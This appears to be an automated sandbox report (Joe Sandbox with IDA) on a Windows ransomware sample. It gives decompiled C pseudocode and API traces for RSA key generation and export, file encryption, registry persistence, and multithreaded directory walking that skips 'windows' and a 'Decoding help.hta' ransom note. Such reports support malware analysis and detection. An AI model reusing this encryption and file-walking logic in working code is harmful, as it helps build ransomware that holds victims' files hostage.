    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004), ref: 00401B1C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$Context$Acquire$CloseOpen$DestroyEncryptExportFileImportQueryReleaseSleeplstrlen$AllocCopyEnvironmentErrorExecuteGlobalLastMemoryModuleNameShellVariableZerolstrcmpi
    • String ID: hy:@
    • API String ID: 502290952-3615739078
    • Opcode ID: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction ID: 86879c33b08c28671aa86a1e658d7eba573c44414e10c71c68188b85a97574e0
    • Opcode Fuzzy Hash: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction Fuzzy Hash: 60D1C071B943097AEB21AA91CC43FDE7A79AB04B09F20413AF700790E1D7FD6A14966D
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    C-Code - Quality: 55%
    			E0040191C() {
    				void* _t138;
    				void* _t144;
    				char* _t147;
    				CHAR* _t148;
    				void* _t149;
    				void* _t153;
    				void* _t154;
    
    				_push(_t153 - 0x1c);
    				_push(0x8000001);
    				_push(1);
    				_push( *(_t153 - 0x28));
    				L00401F86(); // executed
    				 *(_t153 - 0x2c) = 0x494;
    				_push(_t153 - 0x2c);
    				_push( *(_t153 - 0x24));
    				_push(0);
    				_push(7);
    				_push(0);
    				_push( *(_t153 - 0x1c));
    				L00401F80(); // executed
    				 *(_t153 - 0x2c) = 0x114;
    				_push(_t153 - 0x2c);
    				_push(0x4045e0);
    				_push(0);
    				_push(6);
    				_push(0);
    				_push( *(_t153 - 0x1c));
    				L00401F80();
    				CryptDestroyKey( *(_t153 - 0x1c));
    				CryptReleaseContext( *(_t153 - 0x28), 0);
    				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
    				CryptImportKey( *(_t153 - 0x28), 0x403fbf, 0x114, 0, 0, 0x403abb);
    				 *(_t153 - 0x34) = 4;
    				_t149 =  *(_t153 - 0x24);
    				_t138 = 0x4040e0;
    				do {
    					 *(_t153 - 0x2c) = 0xf4;
    					asm("cld");
    					memcpy(_t138, _t149, 0xf4);
    					_t154 = _t154 + 0xc;
    					_push(0x500);
    					_push(_t153 - 0x2c);
    					_push(_t138);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push( *0x403abb); // executed
    					L00401F7A(); // executed
    					_t138 = _t149 + 0x1f4;
    					_t18 = _t153 - 0x34;
    					 *_t18 =  *(_t153 - 0x34) - 1;
    				} while ( *_t18 != 0);
    				 *(_t153 - 0x2c) = 0xc4;
    				asm("cld");
    				memcpy(_t138, _t149, 0xc4);
    				_push(0x500);
    				_push(_t153 - 0x2c);
    				_push(_t138);
    				_push(0);
    				_push(1);
    				_push(0);
    				_push( *0x403abb); // executed
    				L00401F7A(); // executed
    				CryptDestroyKey( *0x403abb); // executed
    				CryptReleaseContext( *(_t153 - 0x28), "true");
    				RegSetValueExA( *(_t153 - 0x20), 0x4037e8, 0, 3, 0x4045e0, 0x114);
    				RegSetValueExA( *(_t153 - 0x20), 0x4037e9, 0, 3, 0x4040e0, 0x500);
    				RegCloseKey( *(_t153 - 0x20));
    				_push(0x8000);
    				_push( *(_t153 - 0x24));
    				L00401EF6();
    				RegOpenKeyExA(0x80000002, 0x403940, 0, 0xf013f, _t153 - 0x20); // executed
    				RegSetValueExA( *(_t153 - 0x20), 0x4039de, 0, 4,  *(_t153 - 0x24), 4);
    				RegSetValueExA( *(_t153 - 0x20), 0x4039f4, 0, 4,  *(_t153 - 0x24), 4);
    				RegSetValueExA( *(_t153 - 0x20), 0x4039fe, 0, 4,  *(_t153 - 0x24), 4);
    				RegCloseKey( *(_t153 - 0x20));
    				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
    				CryptImportKey( *(_t153 - 0x28), 0x4045e0, 0x114, 0, 0, 0x403abb);
    				 *(_t153 - 0x34) = 0x4035b5;
    				 *(_t153 - 0x34) =  *(_t153 - 0x34) - 5;
    				_push(4);
    				asm("lodsd");
    				asm("bswap edx");
    				asm("xlatb");
    				asm("stosb");
    				asm("rol edx, 0x6");
    				asm("loop 0xfffffff5");
    				asm("loop 0xffffffe6");
    				 *0x004035B4 = 0x33;
    				GetSystemTimeAsFileTime(_t153 - 0x18);
    				 *((intOrPtr*)(_t153 - 0x14)) =  *((intOrPtr*)(_t153 - 0x14)) + 0x258;
    				FileTimeToSystemTime(_t153 - 0x18, _t153 - 0x10);
    				GetDateFormatA(0, 0, _t153 - 0x10, 0x403804, 0x403449, 0xa);
    				 *0x403ab3 = lstrlenA(0x403006);
    				MultiByteToWideChar(3, 0,  *(_t153 - 0x34), 0xffffffff, 0x4046f4, 0x19);
    				 *0x4046f4 = 0x2e;
    				_t144 =  *(_t153 - 0x24);
    				asm("cld");
    				memcpy(_t144,  *(_t153 - 0x34), 0x19);
    				_t147 = _t144;
    				 *_t147 = 0x2e;
    				lstrcatA(_t147, 0x4037d4);
    				RegCreateKeyA(0x80000000, _t147, _t153 - 0x20); // executed
    				_t148 =  &(_t147[0x200]);
    				lstrcatA(_t148, 0x403a94);
    				lstrcatA(_t148, 0x403a56);
    				RegSetValueExA( *(_t153 - 0x20), 0x403003, 0, 1, _t148, lstrlenA(_t148));
    				RegCloseKey( *(_t153 - 0x20));
    				SHChangeNotify(0x8000000, 0, 0, 0); // executed
    				GetEnvironmentVariableA(0x40380f,  *(_t153 - 0x24), 0x5dc); // executed
    				ShellExecuteA(0, 0,  *(_t153 - 0x24), 0x4038c1, 0, 0); // executed
    				GlobalFree( *(_t153 - 0x24)); // executed
    				SetErrorMode(1); // executed
    				E00401DE7(0x403a2a, 0); // executed
    				E00401DE7(0x403a3c, 0); // executed
    				while(1) {
    					E004016FF(); // executed
    					while(1) {
    						Sleep(0x7530); // executed
    						if( *0x403ab7 == 0) {
    							break;
    						}
    					}
    					Sleep(0x1388);
    					if( *((intOrPtr*)(_t153 - 0x38)) == 0) {
    						 *((intOrPtr*)(_t153 - 0x38)) =  *((intOrPtr*)(_t153 - 0x38)) + 1;
    						ShellExecuteA(0, 0x40393b, 0x403a56, 0, 0, 5);
    					}
    					 *(_t153 - 0x28) = CreateFileA(0x4037ed, 0xc0000000, 0, 0, 4, 0, 0);
    					WriteFile( *(_t153 - 0x28), 0x403817, 0xaa, _t153 - 0x34, 0);
    					CloseHandle( *(_t153 - 0x28));
    					ShellExecuteA(0, 0x40393b, 0x4037ed, 0, 0, 0);
    				}
    			}

    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,004037E8,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9,00000000,00000003,004040E0,00000500,?,004037E8), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F,?,?,00008000,?,?,004037E9), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004,?,00000004,80000002,00403940,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004,?,00000004,?,004039DE,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004,?,00000004,?,004039F4,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000,00000004), ref: 00401B1C
    • GetSystemTimeAsFileTime.KERNEL32(?,?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?,004039FE,00000000), ref: 00401B63
    • FileTimeToSystemTime.KERNEL32(?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB,?,00000000,00000000,00000001,F0000000,?,?), ref: 00401B77
    • GetDateFormatA.KERNEL32(00000000,00000000,?,00403804,00403449,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB,?), ref: 00401B90
    • lstrlenA.KERNEL32(00403006,00000000,00000000,?,00403804,00403449,0000000A,?,?,?,?,004045E0,00000114,00000000,00000000,00403ABB), ref: 00401B9A
    • MultiByteToWideChar.KERNEL32(00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449,0000000A,?,?,?), ref: 00401BB4
    • lstrcatA.KERNEL32(?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449,0000000A,?), ref: 00401BD9
    • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00401BE8
    • lstrcatA.KERNEL32(?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?,00403804,00403449), ref: 00401BF9
    • lstrcatA.KERNEL32(?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000,?), ref: 00401C04
    • lstrlenA.KERNEL32(?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005,000000FF,004046F4,00000019,00403006,00000000,00000000), ref: 00401C0A
    • RegSetValueExA.ADVAPI32(?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000,00000005), ref: 00401C1D
    • RegCloseKey.ADVAPI32(?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?,004037D4,00000003,00000000), ref: 00401C25
    • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00401C35
    • GetEnvironmentVariableA.KERNEL32(0040380F,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?,00403A94,?), ref: 00401C47
    • ShellExecuteA.SHELL32(00000000,00000000,?,004038C1,00000000,00000000), ref: 00401C5C
    • GlobalFree.KERNEL32 ref: 00401C64
    • SetErrorMode.KERNEL32(00000001,?,0040380F,?,000005DC,?,?,00403003,00000000,00000001,?,00000000,?,?,00403A56,?), ref: 00401C6B
    • Sleep.KERNEL32(00007530,00403A3C,00000000,00403A2A,00000000,00000001,?,0040380F,?,000005DC,?,?,00403003,00000000,00000001,?), ref: 00401C92
    • Sleep.KERNEL32(00001388,00007530,00007530,00403A3C,00000000,00403A2A,00000000,00000001,?,0040380F,?,000005DC,?,?,00403003,00000000), ref: 00401CA9
    • ShellExecuteA.SHELL32(00000000,0040393B,00403A56,00000000,00000000,00000005), ref: 00401CC9
    • CreateFileA.KERNEL32(004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,00403A3C,00000000,00403A2A,00000000,00000001,?), ref: 00401CE2
    • WriteFile.KERNEL32(?,00403817,000000AA,00000005,00000000,004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530,00403A3C), ref: 00401CFD
    • CloseHandle.KERNEL32(?,?,00403817,000000AA,00000005,00000000,004037ED,C0000000,00000000,00000000,00000004,00000000,00000000,00001388,00007530,00007530), ref: 00401D05
    • ShellExecuteA.SHELL32(00000000,0040393B,004037ED,00000000,00000000,00000000), ref: 00401D1C
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$CloseContextFileTime$ExecuteShelllstrcat$AcquireCreateDestroyEncryptExportImportReleaseSleepSystemlstrlen$ByteChangeCharDateEnvironmentErrorFormatFreeGlobalHandleMemoryModeMultiNotifyOpenVariableWideWriteZero
    • String ID:
    • API String ID: 204179998-0
    • Opcode ID: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction ID: 1140f1e6a0d84ce1b2bbf66032a6f78f9ab0211b56a4c443091a9b8f8d6dd5e8
    • Opcode Fuzzy Hash: bab4de6a3842e2200fc4419f95baa4f4f36254ee96687c4dd4c72e7aacfdb836
    • Instruction Fuzzy Hash: 40A1D271B843097AEB21AB91CC43FDD7A79AB44B19F20403AF700790F1D7F96A149A6D
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 97%
    			E004014CC(WCHAR* _a4) {
    				void* _v8;
    				void* _v12;
    				struct _WIN32_FIND_DATAW _v604;
    				struct _MEMORYSTATUS _v636;
    				void* _t47;
    				void* _t48;
    				signed int _t59;
    				WCHAR* _t83;
    				WCHAR* _t94;
    				WCHAR* _t98;
    				WCHAR* _t99;
    				void* _t101;
    				void* _t102;
    
    				_t47 = FindFirstFileW(_a4,  &_v604) + 1;
    				if(_t47 == 0) {
    					L22:
    					_t48 = GlobalFree(_a4); // executed
    					 *0x403ab7 =  *0x403ab7 - 1;
    					return _t48;
    				} else {
    					_v12 = _t47 - 1;
    					do {
    						if((_v604.dwFileAttributes & 0x00000010) == 0) {
    							E00401096(_a4);
    							if(_v604.nFileSizeHigh != 0 || _v604.nFileSizeLow >= 0x20) {
    								_t94 =  &(_v604.cFileName);
    								if(lstrcmpiW(L"Decoding help.hta", _t94) != 0) {
    									_t59 = lstrlenW(_t94);
    									if(_t59 <= 0x19 || lstrcmpiW(0x40471e, _t101 + _t59 * 2 - 0x234) != 0) {
    										_t100 = _a4;
    										lstrcatW(_t100 + 0x8020, _a4);
    										 *(_t100 + 0x801a + lstrlenW(_t100 + 0x8020) * 2) = 0;
    										lstrcatW(_t100 + 0x8020,  &(_v604.cFileName));
    										lstrcatW(_t100 + 0x10040, _t100 + 0x8020);
    										lstrcatW(_t100 + 0x10040, 0x4046f4);
    										if((_v604.dwFileAttributes & 0x00000001) != 0) {
    											_t100 = _a4;
    											SetFileAttributesW( &(_a4[0x4010]), 0x80);
    										}
    										E0040128D(_t100 + 0x8020,  &_v604);
    									}
    								}
    							}
    							goto L20;
    						}
    						_t98 =  &(_v604.cFileName);
    						if(lstrcmpW(0x403002, _t98) != 0 && lstrcmpW(0x403000, _t98) != 0 && lstrcmpiW(L"windows", _t98) != 0) {
    							_t83 = E00401781(0x18060);
    							_t99 = _t83;
    							_v8 = _t83;
    							lstrcatW(_t99, _a4);
    							 *((char*)(_t99 + lstrlenW(_t99) * 2 - 6)) = 0;
    							lstrcatW(_t99, _t98);
    							lstrcatW(_t99, L"\\*.*");
    							while( *0x403ab7 > 0x64) {
    								_v636.dwLength = 0x20;
    								GlobalMemoryStatus( &_v636);
    								if(_v636.dwMemoryLoad <= 0x46) {
    									break;
    								}
    								Sleep(0x64);
    							}
    							 *0x403ab7 =  *0x403ab7 + 1;
    							CloseHandle(CreateThread(0, 0x10000, E004014CC, _v8, 0, 0));
    						}
    						L20:
    						asm("cld");
    						memset( &(_a4[0x4010]), 0, 0x4010 << 2);
    						_t102 = _t102 + 0xc;
    					} while (FindNextFileW(_v12,  &_v604) != 0);
    					FindClose(_v12);
    					goto L22;
    				}
    			}

    APIs
    • FindFirstFileW.KERNEL32(?,?), ref: 004014DF
    • lstrcmpW.KERNEL32(00403002,?,?,?), ref: 0040150A
    • lstrcmpW.KERNEL32(00403000,?,00403002,?,?,?), ref: 0040151D
    • lstrcmpiW.KERNEL32(windows,?,00403000,?,00403002,?,?,?), ref: 00401530
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,?), ref: 00401550
    • lstrlenW.KERNEL32(00000000,00000000,?,00018060,windows,?,00403000,?,00403002,?,?,?), ref: 00401556
    • lstrcatW.KERNEL32(00000000,?), ref: 00401562
    • lstrcatW.KERNEL32(00000000,\*.*), ref: 0040156D
    • GlobalMemoryStatus.KERNEL32 ref: 0040158C
    • Sleep.KERNEL32(00000064,00000020), ref: 0040159C
    • CreateThread.KERNEL32 ref: 004015BC
    • CloseHandle.KERNEL32(00000000,00000000,00010000,004014CC,?,00000000,00000000,00000000,\*.*,00000000,?,00000000,00000000,?,00018060,windows), ref: 004015C2
    • lstrcmpiW.KERNEL32(Decoding help.hta,?), ref: 004015F7
    • lstrlenW.KERNEL32(?,Decoding help.hta,?), ref: 00401605
    • lstrcmpiW.KERNEL32(0040471E,?,?,Decoding help.hta,?), ref: 0040161C
    • lstrcatW.KERNEL32(?,?), ref: 00401636
    • lstrlenW.KERNEL32(?,?,?,?,Decoding help.hta,?), ref: 00401642
    • lstrcatW.KERNEL32(?,?), ref: 00401660
    • lstrcatW.KERNEL32(?,?), ref: 00401673
    • lstrcatW.KERNEL32(?,004046F4), ref: 00401684
    • SetFileAttributesW.KERNEL32(?,00000080,?,004046F4,?,?,?,?), ref: 004016A3
    • FindNextFileW.KERNEL32(?,?,Decoding help.hta,?), ref: 004016D8
    • FindClose.KERNEL32(?,?,?,Decoding help.hta,?), ref: 004016E8
    • GlobalFree.KERNEL32 ref: 004016F0
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: lstrcat$FileFindGloballstrcmpilstrlen$CloseSleeplstrcmp$AllocAttributesCreateFirstFreeHandleMemoryNextStatusThread
    • String ID: $ $Decoding help.hta$F$\*.*$windows
    • API String ID: 1743110542-2524403619
    • Opcode ID: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction ID: 09e95a69dfff6291da4a77d36d8e93e18ae8ba3574d23d213d765ecb4674e2ae
    • Opcode Fuzzy Hash: 4dc6aadf99c061102afc8f237ffd88845ec39796d56319ad5cd229dcb5d01f25
    • Instruction Fuzzy Hash: BC5173719006097ACB21ABA1CC4AFDF76ACAF44308F14047BF949B61F1DB7D9A848B5D
    Uniqueness

    Uniqueness Score: -1,00%

    Control-flow Graph

    C-Code - Quality: 97%
    			E004014CC(WCHAR* _a4) {
    				void* _v8;
    				void* _v12;
    				struct _WIN32_FIND_DATAW _v604;
    				struct _MEMORYSTATUS _v636;
    				void* _t47;
    				void* _t48;
    				signed int _t59;
    				WCHAR* _t83;
    				WCHAR* _t94;
    				WCHAR* _t98;
    				WCHAR* _t99;
    				void* _t101;
    				void* _t102;
    
    				_t47 = FindFirstFileW(_a4,  &_v604) + 1;
    				if(_t47 == 0) {
    					L22:
    					_t48 = GlobalFree(_a4); // executed
    					 *0x403ab7 =  *0x403ab7 - 1;
    					return _t48;
    				} else {
    					_v12 = _t47 - 1;
    					do {
    						if((_v604.dwFileAttributes & 0x00000010) == 0) {
    							E00401096(_a4);
    							if(_v604.nFileSizeHigh != 0 || _v604.nFileSizeLow >= 0x20) {
    								_t94 =  &(_v604.cFileName);
    								if(lstrcmpiW(0x40379e, _t94) != 0) {
    									_t59 = lstrlenW(_t94);
    									if(_t59 <= 0x19 || lstrcmpiW(?str?, _t101 + _t59 * 2 - 0x234) != 0) {
    										_t100 = _a4;
    										lstrcatW(_t100 + 0x8020, _a4);
    										 *(_t100 + 0x801a + lstrlenW(_t100 + 0x8020) * 2) = 0;
    										lstrcatW(_t100 + 0x8020,  &(_v604.cFileName));
    										lstrcatW(_t100 + 0x10040, _t100 + 0x8020);
    										lstrcatW(_t100 + 0x10040, 0x4046f4);
    										if((_v604.dwFileAttributes & 0x00000001) != 0) {
    											_t100 = _a4;
    											SetFileAttributesW( &(_a4[0x4010]), 0x80);
    										}
    										E0040128D(_t100 + 0x8020,  &_v604);
    									}
    								}
    							}
    							goto L20;
    						}
    						_t98 =  &(_v604.cFileName);
    						if(lstrcmpW(0x403002, _t98) != 0 && lstrcmpW(0x403000, _t98) != 0 && lstrcmpiW(0x4037c4, _t98) != 0) {
    							_t83 = E00401781(0x18060);
    							_t99 = _t83;
    							_v8 = _t83;
    							lstrcatW(_t99, _a4);
    							 *((char*)(_t99 + lstrlenW(_t99) * 2 - 6)) = 0;
    							lstrcatW(_t99, _t98);
    							lstrcatW(_t99, 0x403acb);
    							while( *0x403ab7 > 0x64) {
    								_v636.dwLength = 0x20;
    								GlobalMemoryStatus( &_v636);
    								if(_v636.dwMemoryLoad <= 0x46) {
    									break;
    								}
    								Sleep(0x64);
    							}
    							 *0x403ab7 =  *0x403ab7 + 1;
    							CloseHandle(CreateThread(0, 0x10000, E004014CC, _v8, 0, 0));
    						}
    						L20:
    						asm("cld");
    						memset( &(_a4[0x4010]), 0, 0x4010 << 2);
    						_t102 = _t102 + 0xc;
    					} while (FindNextFileW(_v12,  &_v604) != 0);
    					FindClose(_v12);
    					goto L22;
    				}
    			}

    APIs
    • FindFirstFileW.KERNEL32(?,?), ref: 004014DF
    • lstrcmpW.KERNEL32(00403002,?,?,?), ref: 0040150A
    • lstrcmpW.KERNEL32(00403000,?,00403002,?,?,?), ref: 0040151D
    • lstrcmpiW.KERNEL32(004037C4,?,00403000,?,00403002,?,?,?), ref: 00401530
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,?), ref: 00401550
    • lstrlenW.KERNEL32(00000000,00000000,?,00018060,004037C4,?,00403000,?,00403002,?,?,?), ref: 00401556
    • lstrcatW.KERNEL32(00000000,?), ref: 00401562
    • lstrcatW.KERNEL32(00000000,00403ACB), ref: 0040156D
    • GlobalMemoryStatus.KERNEL32 ref: 0040158C
    • Sleep.KERNEL32(00000064,00000020), ref: 0040159C
    • CreateThread.KERNEL32 ref: 004015BC
    • CloseHandle.KERNEL32(00000000,00000000,00010000,004014CC,?,00000000,00000000,00000000,00403ACB,00000000,?,00000000,00000000,?,00018060,004037C4), ref: 004015C2
    • lstrcmpiW.KERNEL32(0040379E,?), ref: 004015F7
    • lstrlenW.KERNEL32(?,0040379E,?), ref: 00401605
    • lstrcmpiW.KERNEL32(Ug[R,?,?,0040379E,?), ref: 0040161C
    • lstrcatW.KERNEL32(?,?), ref: 00401636
    • lstrlenW.KERNEL32(?,?,?,?,0040379E,?), ref: 00401642
    • lstrcatW.KERNEL32(?,?), ref: 00401660
    • lstrcatW.KERNEL32(?,?), ref: 00401673
    • lstrcatW.KERNEL32(?,004046F4), ref: 00401684
    • SetFileAttributesW.KERNEL32(?,00000080,?,004046F4,?,?,?,?), ref: 004016A3
    • FindNextFileW.KERNEL32(?,?,0040379E,?), ref: 004016D8
    • FindClose.KERNEL32(?,?,?,0040379E,?), ref: 004016E8
